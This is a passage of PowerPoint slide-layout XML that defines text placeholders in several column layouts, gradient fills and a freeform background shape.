        <p:spPr>
          <a:xfrm>
            <a:off x="9696803"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25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0539264E-A58F-B520-A895-112391905A8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1">
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="594686" y="2190751"/>
            <a:ext cx="1965634" cy="655320"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="91440" rIns="0" bIns="91440" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" normalizeH="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="100000">
                      <a:schemeClr val="accent1"/>
                    </a:gs>
                    <a:gs pos="0">
                      <a:schemeClr val="accent1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:path path="circle">
                    <a:fillToRect r="100000" b="100000"/>
                  </a:path>
                </a:gradFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semibold"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="233149" lvl="0" indent="-233149" defTabSz="914102" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master text styles</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594686" y="2940316"/>
            <a:ext cx="1965634" cy="2168894"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="91440" rIns="0" bIns="91440">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charse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0" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BAB9C84-EE90-0A0E-5C5F-73520DBC326A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1">
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2914486" y="2190751"/>
            <a:ext cx="1965634" cy="655320"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="91440" rIns="0" bIns="9144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1" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEBF16CF-E977-117A-19D0-C7A509561C2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1">
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2914486" y="2940316"/>
            <a:ext cx="1965634" cy="2168894"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="91440" rIns="0" bIns="91440">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" inden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2" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0684F49E-C151-2B65-1284-A1CE5CCAF6C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1">
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5234286" y="2190751"/>
            <a:ext cx="1965634" cy="655320"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="91440" rIns="0" bIns="9144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3" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9684061-B8C0-F447-2257-3EEE8EAA9D8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1">
            <p:ph type="body" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5234286" y="2940316"/>
            <a:ext cx="1965634" cy="2168894"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="91440" rIns="0" bIns="91440">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" inden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4" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF7A5AAE-E030-81EB-D45C-1B76414DDE68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1">
            <p:ph type="body" sz="quarter" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7554086" y="2190751"/>
            <a:ext cx="1965634" cy="655320"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="91440" rIns="0" bIns="9144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5" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{333A7BE1-D50E-E7FB-2527-2D01599E1E67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1">
            <p:ph type="body" sz="quarter" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7554086" y="2940316"/>
            <a:ext cx="1965634" cy="2168894"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="91440" rIns="0" bIns="91440">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" inden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6" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8CC04EF-C686-8726-4441-BDD8A880E8BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1">
            <p:ph type="body" sz="quarter" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9873889" y="2190751"/>
            <a:ext cx="1965634" cy="655320"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="91440" rIns="0" bIns="9144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7" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{123EE856-2698-13C7-8362-91F8780250D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1">
            <p:ph type="body" sz="quarter" idx="19"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9873889" y="2940316"/>
            <a:ext cx="1965634" cy="2168894"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="91440" rIns="0" bIns="91440">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" inden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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1231971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4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CB54FB65-39D5-783E-BE15-4D030FFFC2E7}"/>
              </a:ext>
              <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
                <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3322266"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7862A-A193-4672-DA3C-5ACFE27882BD}"/>
              </a:ext>
              <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
                <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6217106"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81AE87-62F6-14C0-A5D4-D1706FE67D55}"/>
              </a:ext>
              <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
                <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9111946"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25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0539264E-A58F-B520-A895-112391905A8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1">
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="594685" y="2190751"/>
            <a:ext cx="2560309" cy="655320"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="91440" rIns="0" bIns="91440" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" normalizeH="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="100000">
                      <a:schemeClr val="accent1"/>
                    </a:gs>
                    <a:gs pos="0">
                      <a:schemeClr val="accent1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:path path="circle">
                    <a:fillToRect r="100000" b="100000"/>
                  </a:path>
                </a:gradFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semibold"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="233149" lvl="0" indent="-233149" defTabSz="914102" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master text styles</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594686" y="2940316"/>
            <a:ext cx="2560320" cy="2168894"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="91440" rIns="0" bIns="91440">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charse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0" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BAB9C84-EE90-0A0E-5C5F-73520DBC326A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1">
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3489520" y="2190751"/>
            <a:ext cx="2560320" cy="655320"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440"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1" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEBF16CF-E977-117A-19D0-C7A509561C2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1">
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3489526" y="2940316"/>
            <a:ext cx="2560320" cy="2168894"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440"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2" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0684F49E-C151-2B65-1284-A1CE5CCAF6C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1">
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384363" y="2190751"/>
            <a:ext cx="2560323" cy="655320"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440"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3" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9684061-B8C0-F447-2257-3EEE8EAA9D8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1">
            <p:ph type="body" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384366" y="2940316"/>
            <a:ext cx="2560320" cy="2168894"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440"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4" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF7A5AAE-E030-81EB-D45C-1B76414DDE68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1">
            <p:ph type="body" sz="quarter" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9279203" y="2190751"/>
            <a:ext cx="2560320" cy="655320"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440"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5" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{333A7BE1-D50E-E7FB-2527-2D01599E1E67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1">
            <p:ph type="body" sz="quarter" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9279203" y="2940316"/>
            <a:ext cx="2560320" cy="2168894"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12125224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3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CB54FB65-39D5-783E-BE15-4D030FFFC2E7}"/>
              </a:ext>
              <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
                <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4264355"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7862A-A193-4672-DA3C-5ACFE27882BD}"/>
              </a:ext>
              <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
                <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8172118"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25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0539264E-A58F-B520-A895-112391905A8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1">
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="596956" y="2190751"/>
            <a:ext cx="3427028" cy="655320"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="91440" rIns="0" bIns="91440" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" normalizeH="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="100000">
                      <a:schemeClr val="accent1"/>
                    </a:gs>
                    <a:gs pos="0">
                      <a:schemeClr val="accent1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:path path="circle">
                    <a:fillToRect r="100000" b="100000"/>
                  </a:path>
                </a:gradFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semibold"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="233149" lvl="0" indent="-233149" defTabSz="914102" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master text styles</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596952" y="2940316"/>
            <a:ext cx="3427043" cy="2168894"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="91440" rIns="0" bIns="91440">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charse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0" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BAB9C84-EE90-0A0E-5C5F-73520DBC326A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1">
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4504709" y="2190751"/>
            <a:ext cx="3427043" cy="655320"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr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1" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEBF16CF-E977-117A-19D0-C7A509561C2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1">
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4504715" y="2940316"/>
            <a:ext cx="3427043" cy="2168894"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr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2" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0684F49E-C151-2B65-1284-A1CE5CCAF6C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1">
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8412476" y="2190751"/>
            <a:ext cx="3427047" cy="655320"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr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3" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9684061-B8C0-F447-2257-3EEE8EAA9D8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1">
            <p:ph type="body" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8412480" y="2940316"/>
            <a:ext cx="3427043" cy="2168894"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37336555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bg>
      <p:bgPr>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="0">
              <a:srgbClr val="1978CF"/>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 name="Freeform: Shape 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEC0234A-9E65-D558-829B-574767F6E489}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4085830" y="-1"/>
            <a:ext cx="8350645" cy="6994525"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 8187237 w 8187650"/>
              <a:gd name="connsiteY0" fmla="*/ 2883262 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 8187237 w 8187650"/>
              <a:gd name="connsiteY1" fmla="*/ 6560352 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 8045326 w 8187650"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 6289128 w 8187650"/>
              <a:gd name="connsiteY3" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 8187650 w 8187650"/>
              <a:gd name="connsiteY4" fmla="*/ 430950 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 8187650 w 8187650"/>
              <a:gd name="connsiteY5" fmla="*/ 2175413 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 5948681 w 8187650"/>
              <a:gd name="connsiteY6" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 4192925 w 8187650"/>
              <a:gd name="connsiteY7" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 6831207 w 8187650"/>
              <a:gd name="connsiteY8" fmla="*/ 1335888 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 7977627 w 8187650"/>
              <a:gd name="connsiteY9" fmla="*/ 463100 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 3276228 w 8187650"/>
              <a:gd name="connsiteY10" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 6601303 w 8187650"/>
              <a:gd name="connsiteY11" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 6625701 w 8187650"/>
              <a:gd name="connsiteY12" fmla="*/ 73580 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 6538369 w 8187650"/>
              <a:gd name="connsiteY13" fmla="*/ 1197788 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 3833625 w 8187650"/>
              <a:gd name="connsiteY14" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 2095073 w 8187650"/>
              <a:gd name="connsiteY15" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 5122439 w 8187650"/>
              <a:gd name="connsiteY16" fmla="*/ 520605 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 5085837 w 8187650"/>
              <a:gd name="connsiteY17" fmla="*/ 241081 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 4846243 w 8187650"/>
              <a:gd name="connsiteY18" fmla="*/ 389163 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 1756863 w 8187650"/>
              <a:gd name="connsiteY19" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 0 w 818765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87650" h="6858000">
                <a:moveTo>
                  <a:pt x="8187237" y="2883262"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8187237" y="6560352"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8045326" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6289128" y="6858000"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="8187650" y="430950"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8187650" y="2175413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5948681" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4192925" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6831207" y="1335888"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7053951" y="870014"/>
                  <a:pt x="7490711" y="567195"/>
                  <a:pt x="7977627" y="463100"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3276228" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6601303" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6625701" y="73580"/>
                </a:lnTo>
